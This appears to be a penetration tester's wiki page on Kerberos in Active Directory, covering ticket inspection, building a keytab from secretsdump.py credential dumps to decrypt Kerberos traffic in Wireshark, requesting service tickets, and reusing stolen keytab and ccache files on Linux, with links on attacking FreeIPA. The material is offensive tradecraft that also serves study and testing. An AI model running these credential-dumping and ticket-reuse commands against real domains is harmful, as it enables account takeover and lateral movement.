# Kerberos

* <https://www.roguelynn.com/words/explain-like-im-5-kerberos/>
* <https://vbscrub.com/2020/05/13/kerberos-protocol-explained/>
* <https://www.tarlogic.com/en/blog/how-kerberos-works/>
* <https://www.tarlogic.com/en/blog/how-to-attack-kerberos/>
* <https://www.tarlogic.com/en/blog/kerberos-iii-how-does-delegation-work/>
* <https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>
* <https://habr.com/ru/company/tomhunter/blog/507140/>
* <https://habr.com/ru/company/tomhunter/blog/509290/>
* <https://ardent101.github.io/posts/kerberos_theory/>
* <https://ardent101.github.io/posts/kerberos_general_attacks/>
* <https://habr.com/ru/articles/803163/>

{% embed url="<https://blog.zsec.uk/common-tool-errors-kerberos/>" %}

{% embed url="<https://youtu.be/qZPvgoUzCdI>" %}

## Synchronize Time

Using `ntpdate`:

```
$ sudo apt install ntpdate -y
$ sudo ntpdate $DC
```

Using `faketime`:

```
$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date
```

Using LDAP:

```
$ LDAP_TIME=`ldapsearch -x -H ldap://DC01.megacorp.local -s base -b "" currentTime | awk '/currentTime/ {print $2}' | grep -v "requesting:" | sed -E 's/^([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})\.0Z$/\1-\2-\3 \4:\5:\6 UTC/'`
$ LDAP_TIME=`date -d "$LDAP_TIME X hours" '+%Y-%m-%d %H:%M:%S'`
$ echo "$LDAP_TIME" && sudo date -u -s "$LDAP_TIME"
```

## Describe Tickets

* <https://github.com/YossiSassi/Get-KerberosServiceTicketAudit>

Using [describeTicket.py](https://github.com/fortra/impacket/blob/master/examples/describeTicket.py):

```
$ describeTicket.py --rc4 21c1d44272e8ad1ee9e6b1aed2943688 --aes d38bf2b75fd1732a4cd7e5d129c62f0ed7feaccaff05c6b4a3bf6a9fc2004036 /tmp/snovvcrash.ccache
```

## Decrypt KRB5 Traffic

* <https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/>
* <https://medium.com/tenable-techblog/decrypt-encrypted-stub-data-in-wireshark-deb132c076e7>

{% code title="keytab.sh" %}

```bash
REALM='MEGACORP.LOCAL'
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out

# ---

cat secretsdump.out | grep aad3b435 | awk -F: '{print "    (23, '\''"$4"'\''),"}' > keys
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print "    (18, '\''"$3"'\''),"}' >> keys
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt
```

{% endcode %}
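As an added example (not part of these notes and not forest-trust-tools' `keytab.py`), a minimal writer and reader for the MIT keytab format that the script above patches `keytab.py` to emit; the principals and key bytes in `SAMPLE_ENTRIES` are constructed placeholders, not real domain keys.

```python
import struct
# MIT keytab v2 (magic 0x0502), big-endian. Entry = int32 length, uint16 component
# count, counted realm, counted components, uint32 name type, uint32 timestamp,
# uint8 kvno, uint16 enctype, counted key; a negative length marks a deleted slot.
KEYTAB_MAGIC = b"\x05\x02"
KRB5_NT_PRINCIPAL = 1
# Constructed placeholder keys (not real domain material): 23 = RC4-HMAC, 18 = AES256.
SAMPLE_ENTRIES = [
    ("snovvcrash", 23, bytes.fromhex("0123456789abcdef" * 2), 2),
    ("MSSQLSvc/SRV01.megacorp.local:1433", 18, bytes(range(32)), 2),
]

def _counted(data: bytes) -> bytes:
    return struct.pack(">H", len(data)) + data

def build_keytab(realm: str, entries, timestamp: int = 0) -> bytes:
    # entries: iterable of (principal, enctype, key_bytes, kvno)
    out = bytearray(KEYTAB_MAGIC)
    for principal, enctype, key, kvno in entries:
        comps = principal.split("/")  # 'svc/host' -> two name components
        body = struct.pack(">H", len(comps)) + _counted(realm.encode())
        body += b"".join(_counted(c.encode()) for c in comps)
        body += struct.pack(">IIBH", KRB5_NT_PRINCIPAL, timestamp, kvno & 0xFF, enctype)
        body += _counted(key)
        out += struct.pack(">i", len(body)) + body
    return bytes(out)

def parse_keytab(data: bytes):
    """Inverse of build_keytab: returns [(principal@REALM, enctype, key, kvno)]."""
    pos, result = 2, []
    def counted():
        nonlocal pos
        (n,) = struct.unpack_from(">H", data, pos)
        pos += 2 + n
        return data[pos - n:pos]
    while pos < len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size < 0:  # deleted slot: skip its bytes
            pos -= size
            continue
        end, (ncomp,) = pos + size, struct.unpack_from(">H", data, pos)
        pos += 2
        realm = counted().decode()
        comps = [counted().decode() for _ in range(ncomp)]
        _nt, _ts, vno8, etype = struct.unpack_from(">IIBH", data, pos)
        pos += 11
        key = counted()
        pos = end  # also skips the optional trailing 32-bit kvno
        result.append(("/".join(comps) + "@" + realm, etype, key, vno8))
    return result
```

Point Wireshark at the resulting file under Preferences > Protocols > KRB5 ("Kerberos keytab file", with "Try to decrypt Kerberos blobs" enabled) to have it decrypt captured AS/TGS exchanges and GSSAPI-wrapped traffic for which a matching key is present.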

## Kerberos on Linux

* <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory>

Check the contents of the `KRB5CCNAME` environment variable:

```
$ env | grep KRB5
```

Request a TGT by supplying a password:

```
$ kinit
$ klist
```

List available SPNs:

```
$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "Administrator@MEGACORP.LOCAL" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName
```

Request TGS for MSSQL service:

```
$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist
```

Re-using keytab files to load and renew a TGT:

```
$ kinit administrator@MEGACORP.LOCAL -k -t /tmp/administrator.keytab
$ klist
$ kinit -R
```

Re-using ccache files:

```
$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCNAME=/tmp/krb5cc_31337
$ klist
```

### FreeIPA

* <https://tishina.in/ops/freeipa-postexploitation>
* <https://habr.com/ru/companies/rvision/articles/825086/>

A blog series by [@n0pe\_sled](https://medium.com/@n0pe_sled) on attacking FreeIPA:

* [Building a FreeIPA Lab](https://posts.specterops.io/building-a-freeipa-lab-17f3f52cd8d9)
* [Attacking FreeIPA — Part I Authentication](https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a)
* [Attacking FreeIPA — Part II Enumeration](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
* [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
* [Attacking FreeIPA — Part IV: CVE-2020-10747](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
* <https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting>
